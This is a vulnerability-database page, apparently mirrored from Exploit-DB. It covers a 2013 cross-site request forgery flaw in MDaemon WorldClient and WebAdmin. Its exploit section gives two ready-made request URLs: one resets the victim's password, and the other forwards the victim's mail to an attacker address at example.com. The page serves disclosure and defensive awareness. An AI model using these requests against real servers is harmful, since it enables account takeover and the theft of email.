Alt-N MDaemon WorldClient And WebAdmin - Cross-Site Request Forgery

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1064733 漏洞类型
发布时间 2013-02-18 更新时间 2013-02-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/38325
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/58076/info

MDaemon WorldClient and WebAdmin are prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. 

http://www.example.com/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&Password=Letme1n&ConfirmPassword=Letme1n

http://www.example.com/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&ForwardingEnabled=Yes&ForwardingRetainCopy=Yes&ForwardingAddress=hacker%40example.com